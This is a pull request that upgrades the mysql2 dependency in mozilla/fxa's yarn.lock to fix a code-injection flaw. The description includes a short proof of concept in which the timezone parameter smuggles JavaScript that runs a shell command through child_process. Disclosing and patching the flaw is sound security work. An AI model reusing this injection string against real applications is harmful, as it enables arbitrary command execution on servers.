### PR TITLE
bugfix: arbitrary code Injection due to improper sanitization in readCodeFor function

### DIFF
--- a/yarn.lock
+++ b/yarn.lock
@@ -38572,7 +38572,7 @@ fsevents@~2.1.1:
     mocha-junit-reporter: ^2.2.0
     mocha-multi: ^1.1.7
     mysql: ^2.18.1
-    mysql2: ^3.9.4
+    mysql2: ^3.9.7
     nest-typed-config: ^2.9.2
     nest-winston: ^1.9.4
     next: 14.2.0
@@ -49953,9 +49953,9 @@ fsevents@~2.1.1:
   languageName: node
   linkType: hard
 
-"mysql2@npm:^3.9.4":
-  version: 3.9.4
-  resolution: "mysql2@npm:3.9.4"
+"mysql2@npm:^3.9.7":
+  version: 3.9.7
+  resolution: "mysql2@npm:3.9.7"
   dependencies:
     denque: ^2.1.0
     generate-function: ^2.3.1
@@ -49965,7 +49965,7 @@ fsevents@~2.1.1:
     named-placeholders: ^1.1.3
     seq-queue: ^0.0.5
     sqlstring: ^2.3.2
-  checksum: 2829f329cda58bfb97d24826242d9e05222a9ab2397b9746afe0c01a4801b18c685f75d268aa15f8b47988ed1ef50b28358ce6f9a69e18cb50d2c965d68b1a75
+  checksum: 535261d076f840f0966788b3f33a5ff7872e5da321240c2359be5c9e7ec19197ed5f6e01f0bc7beae06dd291d03eb2bde00f474461a578debcb85fcd98e347d3
   languageName: node
   linkType: hard
 


### PR DESCRIPTION


## This pull request
The project `mozilla/fxa` was used mysql2 before 3.9.7 are vulnerable to Arbitrary Code Injection due to improper sanitization of the `timezone` parameter in the `readCodeFor` function by calling a native MySQL Server date/time function.

- [CWE-94](https://cwe.mitre.org/data/definitions/94.html)
- `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`

**PoC**
```js
const mysql = require('mysql2');
const connection = mysql.createConnection({
  host: '127.0.0.1',
  user: 'root',
  database: 'test',
  password: '123456',
});

let query_data = {
  sql: `SELECT CURDATE();`,
  timezone:
    "');''.constructor.constructor('return process')().mainModule.require('child_process').execSync('open /System/Applications/Calculator.app');console.log('",
};

connection.query(query_data, (err, results) => {
  if (err) throw err;
  console.log(results);
});

connection.end();

```


## Checklist

_Put an `x` in the boxes that apply_

- [x] My commit is GPG signed.
- [ ] If applicable, I have modified or added tests which pass locally.
- [ ] I have added necessary documentation (if appropriate).
- [x] I have verified that my changes render correctly in RTL (if appropriate).

## Screenshots (Optional)

Please attach the screenshots of the changes made in case of change in user interface.

## Other information (Optional)

Any other information that is important to this pull request.
